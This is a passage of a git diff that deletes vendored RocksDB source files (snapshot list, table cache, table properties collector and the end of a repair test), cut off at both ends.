-                     opts /* unknown_cf_opts */));
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "reverse"},
-                                        std::vector<Options>{opts, rev_opts}));
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      ASSERT_EQ(Get(i, "key" + ToString(j)), "val" + ToString(j));
-    }
-  }
-
-  // Examine table properties to verify RepairDB() used the right options when
-  // converting WAL->SST
-  TablePropertiesCollection fname_to_props;
-  db_->GetPropertiesOfAllTables(handles_[1], &fname_to_props);
-  ASSERT_EQ(fname_to_props.size(), 2U);
-  for (const auto& fname_and_props : fname_to_props) {
-    std::string comparator_name (
-      InternalKeyComparator(rev_opts.comparator).Name());
-    comparator_name = comparator_name.substr(comparator_name.find(':') + 1);
-    ASSERT_EQ(comparator_name,
-              fname_and_props.second->comparator_name);
-  }
-
-  // Also check comparator when it's provided via "unknown" CF options
-  ASSERT_OK(RepairDB(dbname_, opts, {{"default", opts}},
-                     rev_opts /* unknown_cf_opts */));
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "reverse"},
-                                        std::vector<Options>{opts, rev_opts}));
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      ASSERT_EQ(Get(i, "key" + ToString(j)), "val" + ToString(j));
-    }
-  }
-}
-
-#endif  // ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as RepairDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/snapshot_impl.cc b/thirdparty/rocksdb/db/snapshot_impl.cc
deleted file mode 100644
index 032ef39..0000000
--- a/thirdparty/rocksdb/db/snapshot_impl.cc
+++ /dev/null
@@ -1,26 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/snapshot.h"
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-ManagedSnapshot::ManagedSnapshot(DB* db) : db_(db),
-                                           snapshot_(db->GetSnapshot()) {}
-
-ManagedSnapshot::ManagedSnapshot(DB* db, const Snapshot* _snapshot)
-    : db_(db), snapshot_(_snapshot) {}
-
-ManagedSnapshot::~ManagedSnapshot() {
-  if (snapshot_) {
-    db_->ReleaseSnapshot(snapshot_);
-  }
-}
-
-const Snapshot* ManagedSnapshot::snapshot() { return snapshot_;}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/snapshot_impl.h b/thirdparty/rocksdb/db/snapshot_impl.h
deleted file mode 100644
index 7dc4059..0000000
--- a/thirdparty/rocksdb/db/snapshot_impl.h
+++ /dev/null
@@ -1,151 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <vector>
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-class SnapshotList;
-
-// Snapshots are kept in a doubly-linked list in the DB.
-// Each SnapshotImpl corresponds to a particular sequence number.
-class SnapshotImpl : public Snapshot {
- public:
-  SequenceNumber number_;  // const after creation
-
-  virtual SequenceNumber GetSequenceNumber() const override { return number_; }
-
- private:
-  friend class SnapshotList;
-
-  // SnapshotImpl is kept in a doubly-linked circular list
-  SnapshotImpl* prev_;
-  SnapshotImpl* next_;
-
-  SnapshotList* list_;                 // just for sanity checks
-
-  int64_t unix_time_;
-
-  // Will this snapshot be used by a Transaction to do write-conflict checking?
-  bool is_write_conflict_boundary_;
-};
-
-class SnapshotList {
- public:
-  SnapshotList() {
-    list_.prev_ = &list_;
-    list_.next_ = &list_;
-    list_.number_ = 0xFFFFFFFFL;      // placeholder marker, for debugging
-    count_ = 0;
-  }
-
-  bool empty() const { return list_.next_ == &list_; }
-  SnapshotImpl* oldest() const { assert(!empty()); return list_.next_; }
-  SnapshotImpl* newest() const { assert(!empty()); return list_.prev_; }
-
-  const SnapshotImpl* New(SnapshotImpl* s, SequenceNumber seq,
-                          uint64_t unix_time, bool is_write_conflict_boundary) {
-    s->number_ = seq;
-    s->unix_time_ = unix_time;
-    s->is_write_conflict_boundary_ = is_write_conflict_boundary;
-    s->list_ = this;
-    s->next_ = &list_;
-    s->prev_ = list_.prev_;
-    s->prev_->next_ = s;
-    s->next_->prev_ = s;
-    count_++;
-    return s;
-  }
-
-  // Do not responsible to free the object.
-  void Delete(const SnapshotImpl* s) {
-    assert(s->list_ == this);
-    s->prev_->next_ = s->next_;
-    s->next_->prev_ = s->prev_;
-    count_--;
-  }
-
-  // retrieve all snapshot numbers up until max_seq. They are sorted in
-  // ascending order.
-  std::vector<SequenceNumber> GetAll(
-      SequenceNumber* oldest_write_conflict_snapshot = nullptr,
-      const SequenceNumber& max_seq = kMaxSequenceNumber) const {
-    std::vector<SequenceNumber> ret;
-
-    if (oldest_write_conflict_snapshot != nullptr) {
-      *oldest_write_conflict_snapshot = kMaxSequenceNumber;
-    }
-
-    if (empty()) {
-      return ret;
-    }
-    const SnapshotImpl* s = &list_;
-    while (s->next_ != &list_) {
-      if (s->next_->number_ > max_seq) {
-        break;
-      }
-      ret.push_back(s->next_->number_);
-
-      if (oldest_write_conflict_snapshot != nullptr &&
-          *oldest_write_conflict_snapshot == kMaxSequenceNumber &&
-          s->next_->is_write_conflict_boundary_) {
-        // If this is the first write-conflict boundary snapshot in the list,
-        // it is the oldest
-        *oldest_write_conflict_snapshot = s->next_->number_;
-      }
-
-      s = s->next_;
-    }
-    return ret;
-  }
-
-  // Whether there is an active snapshot in range [lower_bound, upper_bound).
-  bool HasSnapshotInRange(SequenceNumber lower_bound,
-                          SequenceNumber upper_bound) {
-    if (empty()) {
-      return false;
-    }
-    const SnapshotImpl* s = &list_;
-    while (s->next_ != &list_) {
-      if (s->next_->number_ >= lower_bound) {
-        return s->next_->number_ < upper_bound;
-      }
-      s = s->next_;
-    }
-    return false;
-  }
-
-  // get the sequence number of the most recent snapshot
-  SequenceNumber GetNewest() {
-    if (empty()) {
-      return 0;
-    }
-    return newest()->number_;
-  }
-
-  int64_t GetOldestSnapshotTime() const {
-    if (empty()) {
-      return 0;
-    } else {
-      return oldest()->unix_time_;
-    }
-  }
-
-  uint64_t count() const { return count_; }
-
- private:
-  // Dummy head of doubly-linked list of snapshots
-  SnapshotImpl list_;
-  uint64_t count_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_cache.cc b/thirdparty/rocksdb/db/table_cache.cc
deleted file mode 100644
index b4d5cc1..0000000
--- a/thirdparty/rocksdb/db/table_cache.cc
+++ /dev/null
@@ -1,472 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/table_cache.h"
-
-#include "db/dbformat.h"
-#include "db/version_edit.h"
-#include "util/filename.h"
-
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/statistics.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/iterator_wrapper.h"
-#include "table/table_builder.h"
-#include "table/table_reader.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-namespace {
-
-template <class T>
-static void DeleteEntry(const Slice& key, void* value) {
-  T* typed_value = reinterpret_cast<T*>(value);
-  delete typed_value;
-}
-
-static void UnrefEntry(void* arg1, void* arg2) {
-  Cache* cache = reinterpret_cast<Cache*>(arg1);
-  Cache::Handle* h = reinterpret_cast<Cache::Handle*>(arg2);
-  cache->Release(h);
-}
-
-static void DeleteTableReader(void* arg1, void* arg2) {
-  TableReader* table_reader = reinterpret_cast<TableReader*>(arg1);
-  delete table_reader;
-}
-
-static Slice GetSliceForFileNumber(const uint64_t* file_number) {
-  return Slice(reinterpret_cast<const char*>(file_number),
-               sizeof(*file_number));
-}
-
-#ifndef ROCKSDB_LITE
-
-void AppendVarint64(IterKey* key, uint64_t v) {
-  char buf[10];
-  auto ptr = EncodeVarint64(buf, v);
-  key->TrimAppend(key->Size(), buf, ptr - buf);
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace
-
-TableCache::TableCache(const ImmutableCFOptions& ioptions,
-                       const EnvOptions& env_options, Cache* const cache)
-    : ioptions_(ioptions), env_options_(env_options), cache_(cache) {
-  if (ioptions_.row_cache) {
-    // If the same cache is shared by multiple instances, we need to
-    // disambiguate its entries.
-    PutVarint64(&row_cache_id_, ioptions_.row_cache->NewId());
-  }
-}
-
-TableCache::~TableCache() {
-}
-
-TableReader* TableCache::GetTableReaderFromHandle(Cache::Handle* handle) {
-  return reinterpret_cast<TableReader*>(cache_->Value(handle));
-}
-
-void TableCache::ReleaseHandle(Cache::Handle* handle) {
-  cache_->Release(handle);
-}
-
-Status TableCache::GetTableReader(
-    const EnvOptions& env_options,
-    const InternalKeyComparator& internal_comparator, const FileDescriptor& fd,
-    bool sequential_mode, size_t readahead, bool record_read_stats,
-    HistogramImpl* file_read_hist, unique_ptr<TableReader>* table_reader,
-    bool skip_filters, int level, bool prefetch_index_and_filter_in_cache,
-    bool for_compaction) {
-  std::string fname =
-      TableFileName(ioptions_.db_paths, fd.GetNumber(), fd.GetPathId());
-  unique_ptr<RandomAccessFile> file;
-  Status s = ioptions_.env->NewRandomAccessFile(fname, &file, env_options);
-
-  RecordTick(ioptions_.statistics, NO_FILE_OPENS);
-  if (s.ok()) {
-    if (readahead > 0) {
-      file = NewReadaheadRandomAccessFile(std::move(file), readahead);
-    }
-    if (!sequential_mode && ioptions_.advise_random_on_open) {
-      file->Hint(RandomAccessFile::RANDOM);
-    }
-    StopWatch sw(ioptions_.env, ioptions_.statistics, TABLE_OPEN_IO_MICROS);
-    std::unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(
-            std::move(file), fname, ioptions_.env,
-            record_read_stats ? ioptions_.statistics : nullptr, SST_READ_MICROS,
-            file_read_hist, ioptions_.rate_limiter, for_compaction));
-    s = ioptions_.table_factory->NewTableReader(
-        TableReaderOptions(ioptions_, env_options, internal_comparator,
-                           skip_filters, level),
-        std::move(file_reader), fd.GetFileSize(), table_reader,
-        prefetch_index_and_filter_in_cache);
-    TEST_SYNC_POINT("TableCache::GetTableReader:0");
-  }
-  return s;
-}
-
-void TableCache::EraseHandle(const FileDescriptor& fd, Cache::Handle* handle) {
-  ReleaseHandle(handle);
-  uint64_t number = fd.GetNumber();
-  Slice key = GetSliceForFileNumber(&number);
-  cache_->Erase(key);
-}
-
-Status TableCache::FindTable(const EnvOptions& env_options,
-                             const InternalKeyComparator& internal_comparator,
-                             const FileDescriptor& fd, Cache::Handle** handle,
-                             const bool no_io, bool record_read_stats,
-                             HistogramImpl* file_read_hist, bool skip_filters,
-                             int level,
-                             bool prefetch_index_and_filter_in_cache) {
-  PERF_TIMER_GUARD(find_table_nanos);
-  Status s;
-  uint64_t number = fd.GetNumber();
-  Slice key = GetSliceForFileNumber(&number);
-  *handle = cache_->Lookup(key);
-  TEST_SYNC_POINT_CALLBACK("TableCache::FindTable:0",
-                           const_cast<bool*>(&no_io));
-
-  if (*handle == nullptr) {
-    if (no_io) {  // Don't do IO and return a not-found status
-      return Status::Incomplete("Table not found in table_cache, no_io is set");
-    }
-    unique_ptr<TableReader> table_reader;
-    s = GetTableReader(env_options, internal_comparator, fd,
-                       false /* sequential mode */, 0 /* readahead */,
-                       record_read_stats, file_read_hist, &table_reader,
-                       skip_filters, level, prefetch_index_and_filter_in_cache);
-    if (!s.ok()) {
-      assert(table_reader == nullptr);
-      RecordTick(ioptions_.statistics, NO_FILE_ERRORS);
-      // We do not cache error results so that if the error is transient,
-      // or somebody repairs the file, we recover automatically.
-    } else {
-      s = cache_->Insert(key, table_reader.get(), 1, &DeleteEntry<TableReader>,
-                         handle);
-      if (s.ok()) {
-        // Release ownership of table reader.
-        table_reader.release();
-      }
-    }
-  }
-  return s;
-}
-
-InternalIterator* TableCache::NewIterator(
-    const ReadOptions& options, const EnvOptions& env_options,
-    const InternalKeyComparator& icomparator, const FileDescriptor& fd,
-    RangeDelAggregator* range_del_agg, TableReader** table_reader_ptr,
-    HistogramImpl* file_read_hist, bool for_compaction, Arena* arena,
-    bool skip_filters, int level) {
-  PERF_TIMER_GUARD(new_table_iterator_nanos);
-
-  Status s;
-  bool create_new_table_reader = false;
-  TableReader* table_reader = nullptr;
-  Cache::Handle* handle = nullptr;
-  if (s.ok()) {
-    if (table_reader_ptr != nullptr) {
-      *table_reader_ptr = nullptr;
-    }
-    size_t readahead = 0;
-    if (for_compaction) {
-#ifndef NDEBUG
-      bool use_direct_reads_for_compaction = env_options.use_direct_reads;
-      TEST_SYNC_POINT_CALLBACK("TableCache::NewIterator:for_compaction",
-                               &use_direct_reads_for_compaction);
-#endif  // !NDEBUG
-      if (ioptions_.new_table_reader_for_compaction_inputs) {
-        readahead = ioptions_.compaction_readahead_size;
-        create_new_table_reader = true;
-      }
-    } else {
-      readahead = options.readahead_size;
-      create_new_table_reader = readahead > 0;
-    }
-
-    if (create_new_table_reader) {
-      unique_ptr<TableReader> table_reader_unique_ptr;
-      s = GetTableReader(
-          env_options, icomparator, fd, true /* sequential_mode */, readahead,
-          !for_compaction /* record stats */, nullptr, &table_reader_unique_ptr,
-          false /* skip_filters */, level,
-          true /* prefetch_index_and_filter_in_cache */, for_compaction);
-      if (s.ok()) {
-        table_reader = table_reader_unique_ptr.release();
-      }
-    } else {
-      table_reader = fd.table_reader;
-      if (table_reader == nullptr) {
-        s = FindTable(env_options, icomparator, fd, &handle,
-                      options.read_tier == kBlockCacheTier /* no_io */,
-                      !for_compaction /* record read_stats */, file_read_hist,
-                      skip_filters, level);
-        if (s.ok()) {
-          table_reader = GetTableReaderFromHandle(handle);
-        }
-      }
-    }
-  }
-  InternalIterator* result = nullptr;
-  if (s.ok()) {
-    result = table_reader->NewIterator(options, arena, skip_filters);
-    if (create_new_table_reader) {
-      assert(handle == nullptr);
-      result->RegisterCleanup(&DeleteTableReader, table_reader, nullptr);
-    } else if (handle != nullptr) {
-      result->RegisterCleanup(&UnrefEntry, cache_, handle);
-      handle = nullptr;  // prevent from releasing below
-    }
-
-    if (for_compaction) {
-      table_reader->SetupForCompaction();
-    }
-    if (table_reader_ptr != nullptr) {
-      *table_reader_ptr = table_reader;
-    }
-  }
-  if (s.ok() && range_del_agg != nullptr && !options.ignore_range_deletions) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        table_reader->NewRangeTombstoneIterator(options));
-    if (range_del_iter != nullptr) {
-      s = range_del_iter->status();
-    }
-    if (s.ok()) {
-      s = range_del_agg->AddTombstones(std::move(range_del_iter));
-    }
-  }
-
-  if (handle != nullptr) {
-    ReleaseHandle(handle);
-  }
-  if (!s.ok()) {
-    assert(result == nullptr);
-    result = NewErrorInternalIterator(s, arena);
-  }
-  return result;
-}
-
-InternalIterator* TableCache::NewRangeTombstoneIterator(
-    const ReadOptions& options, const EnvOptions& env_options,
-    const InternalKeyComparator& icomparator, const FileDescriptor& fd,
-    HistogramImpl* file_read_hist, bool skip_filters, int level) {
-  Status s;
-  TableReader* table_reader = nullptr;
-  Cache::Handle* handle = nullptr;
-  table_reader = fd.table_reader;
-  if (table_reader == nullptr) {
-    s = FindTable(env_options, icomparator, fd, &handle,
-                  options.read_tier == kBlockCacheTier /* no_io */,
-                  true /* record read_stats */, file_read_hist, skip_filters,
-                  level);
-    if (s.ok()) {
-      table_reader = GetTableReaderFromHandle(handle);
-    }
-  }
-  InternalIterator* result = nullptr;
-  if (s.ok()) {
-    result = table_reader->NewRangeTombstoneIterator(options);
-    if (result != nullptr) {
-      if (handle != nullptr) {
-        result->RegisterCleanup(&UnrefEntry, cache_, handle);
-      }
-    }
-  }
-  if (result == nullptr && handle != nullptr) {
-    // the range deletion block didn't exist, or there was a failure between
-    // getting handle and getting iterator.
-    ReleaseHandle(handle);
-  }
-  if (!s.ok()) {
-    assert(result == nullptr);
-    result = NewErrorInternalIterator(s);
-  }
-  return result;
-}
-
-Status TableCache::Get(const ReadOptions& options,
-                       const InternalKeyComparator& internal_comparator,
-                       const FileDescriptor& fd, const Slice& k,
-                       GetContext* get_context, HistogramImpl* file_read_hist,
-                       bool skip_filters, int level) {
-  std::string* row_cache_entry = nullptr;
-  bool done = false;
-#ifndef ROCKSDB_LITE
-  IterKey row_cache_key;
-  std::string row_cache_entry_buffer;
-
-  // Check row cache if enabled. Since row cache does not currently store
-  // sequence numbers, we cannot use it if we need to fetch the sequence.
-  if (ioptions_.row_cache && !get_context->NeedToReadSequence()) {
-    uint64_t fd_number = fd.GetNumber();
-    auto user_key = ExtractUserKey(k);
-    // We use the user key as cache key instead of the internal key,
-    // otherwise the whole cache would be invalidated every time the
-    // sequence key increases. However, to support caching snapshot
-    // reads, we append the sequence number (incremented by 1 to
-    // distinguish from 0) only in this case.
-    uint64_t seq_no =
-        options.snapshot == nullptr ? 0 : 1 + GetInternalKeySeqno(k);
-
-    // Compute row cache key.
-    row_cache_key.TrimAppend(row_cache_key.Size(), row_cache_id_.data(),
-                             row_cache_id_.size());
-    AppendVarint64(&row_cache_key, fd_number);
-    AppendVarint64(&row_cache_key, seq_no);
-    row_cache_key.TrimAppend(row_cache_key.Size(), user_key.data(),
-                             user_key.size());
-
-    if (auto row_handle =
-            ioptions_.row_cache->Lookup(row_cache_key.GetUserKey())) {
-      // Cleanable routine to release the cache entry
-      Cleanable value_pinner;
-      auto release_cache_entry_func = [](void* cache_to_clean,
-                                         void* cache_handle) {
-        ((Cache*)cache_to_clean)->Release((Cache::Handle*)cache_handle);
-      };
-      auto found_row_cache_entry = static_cast<const std::string*>(
-          ioptions_.row_cache->Value(row_handle));
-      // If it comes here value is located on the cache.
-      // found_row_cache_entry points to the value on cache,
-      // and value_pinner has cleanup procedure for the cached entry.
-      // After replayGetContextLog() returns, get_context.pinnable_slice_
-      // will point to cache entry buffer (or a copy based on that) and
-      // cleanup routine under value_pinner will be delegated to
-      // get_context.pinnable_slice_. Cache entry is released when
-      // get_context.pinnable_slice_ is reset.
-      value_pinner.RegisterCleanup(release_cache_entry_func,
-                                   ioptions_.row_cache.get(), row_handle);
-      replayGetContextLog(*found_row_cache_entry, user_key, get_context,
-                          &value_pinner);
-      RecordTick(ioptions_.statistics, ROW_CACHE_HIT);
-      done = true;
-    } else {
-      // Not found, setting up the replay log.
-      RecordTick(ioptions_.statistics, ROW_CACHE_MISS);
-      row_cache_entry = &row_cache_entry_buffer;
-    }
-  }
-#endif  // ROCKSDB_LITE
-  Status s;
-  TableReader* t = fd.table_reader;
-  Cache::Handle* handle = nullptr;
-  if (!done && s.ok()) {
-    if (t == nullptr) {
-      s = FindTable(env_options_, internal_comparator, fd, &handle,
-                    options.read_tier == kBlockCacheTier /* no_io */,
-                    true /* record_read_stats */, file_read_hist, skip_filters,
-                    level);
-      if (s.ok()) {
-        t = GetTableReaderFromHandle(handle);
-      }
-    }
-    if (s.ok() && get_context->range_del_agg() != nullptr &&
-        !options.ignore_range_deletions) {
-      std::unique_ptr<InternalIterator> range_del_iter(
-          t->NewRangeTombstoneIterator(options));
-      if (range_del_iter != nullptr) {
-        s = range_del_iter->status();
-      }
-      if (s.ok()) {
-        s = get_context->range_del_agg()->AddTombstones(
-            std::move(range_del_iter));
-      }
-    }
-    if (s.ok()) {
-      get_context->SetReplayLog(row_cache_entry);  // nullptr if no cache.
-      s = t->Get(options, k, get_context, skip_filters);
-      get_context->SetReplayLog(nullptr);
-    } else if (options.read_tier == kBlockCacheTier && s.IsIncomplete()) {
-      // Couldn't find Table in cache but treat as kFound if no_io set
-      get_context->MarkKeyMayExist();
-      s = Status::OK();
-      done = true;
-    }
-  }
-
-#ifndef ROCKSDB_LITE
-  // Put the replay log in row cache only if something was found.
-  if (!done && s.ok() && row_cache_entry && !row_cache_entry->empty()) {
-    size_t charge =
-        row_cache_key.Size() + row_cache_entry->size() + sizeof(std::string);
-    void* row_ptr = new std::string(std::move(*row_cache_entry));
-    ioptions_.row_cache->Insert(row_cache_key.GetUserKey(), row_ptr, charge,
-                                &DeleteEntry<std::string>);
-  }
-#endif  // ROCKSDB_LITE
-
-  if (handle != nullptr) {
-    ReleaseHandle(handle);
-  }
-  return s;
-}
-
-Status TableCache::GetTableProperties(
-    const EnvOptions& env_options,
-    const InternalKeyComparator& internal_comparator, const FileDescriptor& fd,
-    std::shared_ptr<const TableProperties>* properties, bool no_io) {
-  Status s;
-  auto table_reader = fd.table_reader;
-  // table already been pre-loaded?
-  if (table_reader) {
-    *properties = table_reader->GetTableProperties();
-
-    return s;
-  }
-
-  Cache::Handle* table_handle = nullptr;
-  s = FindTable(env_options, internal_comparator, fd, &table_handle, no_io);
-  if (!s.ok()) {
-    return s;
-  }
-  assert(table_handle);
-  auto table = GetTableReaderFromHandle(table_handle);
-  *properties = table->GetTableProperties();
-  ReleaseHandle(table_handle);
-  return s;
-}
-
-size_t TableCache::GetMemoryUsageByTableReader(
-    const EnvOptions& env_options,
-    const InternalKeyComparator& internal_comparator,
-    const FileDescriptor& fd) {
-  Status s;
-  auto table_reader = fd.table_reader;
-  // table already been pre-loaded?
-  if (table_reader) {
-    return table_reader->ApproximateMemoryUsage();
-  }
-
-  Cache::Handle* table_handle = nullptr;
-  s = FindTable(env_options, internal_comparator, fd, &table_handle, true);
-  if (!s.ok()) {
-    return 0;
-  }
-  assert(table_handle);
-  auto table = GetTableReaderFromHandle(table_handle);
-  auto ret = table->ApproximateMemoryUsage();
-  ReleaseHandle(table_handle);
-  return ret;
-}
-
-void TableCache::Evict(Cache* cache, uint64_t file_number) {
-  cache->Erase(GetSliceForFileNumber(&file_number));
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_cache.h b/thirdparty/rocksdb/db/table_cache.h
deleted file mode 100644
index 8b65baf..0000000
--- a/thirdparty/rocksdb/db/table_cache.h
+++ /dev/null
@@ -1,146 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Thread-safe (provides internal synchronization)
-
-#pragma once
-#include <string>
-#include <vector>
-#include <stdint.h>
-
-#include "db/dbformat.h"
-#include "db/range_del_aggregator.h"
-#include "options/cf_options.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/table_reader.h"
-
-namespace rocksdb {
-
-class Env;
-class Arena;
-struct FileDescriptor;
-class GetContext;
-class HistogramImpl;
-class InternalIterator;
-
-class TableCache {
- public:
-  TableCache(const ImmutableCFOptions& ioptions,
-             const EnvOptions& storage_options, Cache* cache);
-  ~TableCache();
-
-  // Return an iterator for the specified file number (the corresponding
-  // file length must be exactly "file_size" bytes).  If "tableptr" is
-  // non-nullptr, also sets "*tableptr" to point to the Table object
-  // underlying the returned iterator, or nullptr if no Table object underlies
-  // the returned iterator.  The returned "*tableptr" object is owned by
-  // the cache and should not be deleted, and is valid for as long as the
-  // returned iterator is live.
-  // @param range_del_agg If non-nullptr, adds range deletions to the
-  //    aggregator. If an error occurs, returns it in a NewErrorInternalIterator
-  // @param skip_filters Disables loading/accessing the filter block
-  // @param level The level this table is at, -1 for "not set / don't know"
-  InternalIterator* NewIterator(
-      const ReadOptions& options, const EnvOptions& toptions,
-      const InternalKeyComparator& internal_comparator,
-      const FileDescriptor& file_fd, RangeDelAggregator* range_del_agg,
-      TableReader** table_reader_ptr = nullptr,
-      HistogramImpl* file_read_hist = nullptr, bool for_compaction = false,
-      Arena* arena = nullptr, bool skip_filters = false, int level = -1);
-
-  InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& options, const EnvOptions& toptions,
-      const InternalKeyComparator& internal_comparator,
-      const FileDescriptor& file_fd, HistogramImpl* file_read_hist,
-      bool skip_filters, int level);
-
-  // If a seek to internal key "k" in specified file finds an entry,
-  // call (*handle_result)(arg, found_key, found_value) repeatedly until
-  // it returns false.
-  // @param get_context State for get operation. If its range_del_agg() returns
-  //    non-nullptr, adds range deletions to the aggregator. If an error occurs,
-  //    returns non-ok status.
-  // @param skip_filters Disables loading/accessing the filter block
-  // @param level The level this table is at, -1 for "not set / don't know"
-  Status Get(const ReadOptions& options,
-             const InternalKeyComparator& internal_comparator,
-             const FileDescriptor& file_fd, const Slice& k,
-             GetContext* get_context, HistogramImpl* file_read_hist = nullptr,
-             bool skip_filters = false, int level = -1);
-
-  // Evict any entry for the specified file number
-  static void Evict(Cache* cache, uint64_t file_number);
-
-  // Clean table handle and erase it from the table cache
-  // Used in DB close, or the file is not live anymore.
-  void EraseHandle(const FileDescriptor& fd, Cache::Handle* handle);
-
-  // Find table reader
-  // @param skip_filters Disables loading/accessing the filter block
-  // @param level == -1 means not specified
-  Status FindTable(const EnvOptions& toptions,
-                   const InternalKeyComparator& internal_comparator,
-                   const FileDescriptor& file_fd, Cache::Handle**,
-                   const bool no_io = false, bool record_read_stats = true,
-                   HistogramImpl* file_read_hist = nullptr,
-                   bool skip_filters = false, int level = -1,
-                   bool prefetch_index_and_filter_in_cache = true);
-
-  // Get TableReader from a cache handle.
-  TableReader* GetTableReaderFromHandle(Cache::Handle* handle);
-
-  // Get the table properties of a given table.
-  // @no_io: indicates if we should load table to the cache if it is not present
-  //         in table cache yet.
-  // @returns: `properties` will be reset on success. Please note that we will
-  //            return Status::Incomplete() if table is not present in cache and
-  //            we set `no_io` to be true.
-  Status GetTableProperties(const EnvOptions& toptions,
-                            const InternalKeyComparator& internal_comparator,
-                            const FileDescriptor& file_meta,
-                            std::shared_ptr<const TableProperties>* properties,
-                            bool no_io = false);
-
-  // Return total memory usage of the table reader of the file.
-  // 0 if table reader of the file is not loaded.
-  size_t GetMemoryUsageByTableReader(
-      const EnvOptions& toptions,
-      const InternalKeyComparator& internal_comparator,
-      const FileDescriptor& fd);
-
-  // Release the handle from a cache
-  void ReleaseHandle(Cache::Handle* handle);
-
-  // Capacity of the backing Cache that indicates inifinite TableCache capacity.
-  // For example when max_open_files is -1 we set the backing Cache to this.
-  static const int kInfiniteCapacity = 0x400000;
-
- private:
-  // Build a table reader
-  Status GetTableReader(const EnvOptions& env_options,
-                        const InternalKeyComparator& internal_comparator,
-                        const FileDescriptor& fd, bool sequential_mode,
-                        size_t readahead, bool record_read_stats,
-                        HistogramImpl* file_read_hist,
-                        unique_ptr<TableReader>* table_reader,
-                        bool skip_filters = false, int level = -1,
-                        bool prefetch_index_and_filter_in_cache = true,
-                        bool for_compaction = false);
-
-  const ImmutableCFOptions& ioptions_;
-  const EnvOptions& env_options_;
-  Cache* const cache_;
-  std::string row_cache_id_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/table_properties_collector.cc b/thirdparty/rocksdb/db/table_properties_collector.cc
deleted file mode 100644
index a1f4dba..0000000
--- a/thirdparty/rocksdb/db/table_properties_collector.cc
+++ /dev/null
@@ -1,134 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/table_properties_collector.h"
-
-#include "db/dbformat.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-Status InternalKeyPropertiesCollector::InternalAdd(const Slice& key,
-                                                   const Slice& value,
-                                                   uint64_t file_size) {
-  ParsedInternalKey ikey;
-  if (!ParseInternalKey(key, &ikey)) {
-    return Status::InvalidArgument("Invalid internal key");
-  }
-
-  // Note: We count both, deletions and single deletions here.
-  if (ikey.type == ValueType::kTypeDeletion ||
-      ikey.type == ValueType::kTypeSingleDeletion) {
-    ++deleted_keys_;
-  } else if (ikey.type == ValueType::kTypeMerge) {
-    ++merge_operands_;
-  }
-
-  return Status::OK();
-}
-
-Status InternalKeyPropertiesCollector::Finish(
-    UserCollectedProperties* properties) {
-  assert(properties);
-  assert(properties->find(
-        InternalKeyTablePropertiesNames::kDeletedKeys) == properties->end());
-  assert(properties->find(InternalKeyTablePropertiesNames::kMergeOperands) ==
-         properties->end());
-
-  std::string val_deleted_keys;
-  PutVarint64(&val_deleted_keys, deleted_keys_);
-  properties->insert(
-      {InternalKeyTablePropertiesNames::kDeletedKeys, val_deleted_keys});
-
-  std::string val_merge_operands;
-  PutVarint64(&val_merge_operands, merge_operands_);
-  properties->insert(
-      {InternalKeyTablePropertiesNames::kMergeOperands, val_merge_operands});
-
-  return Status::OK();
-}
-
-UserCollectedProperties
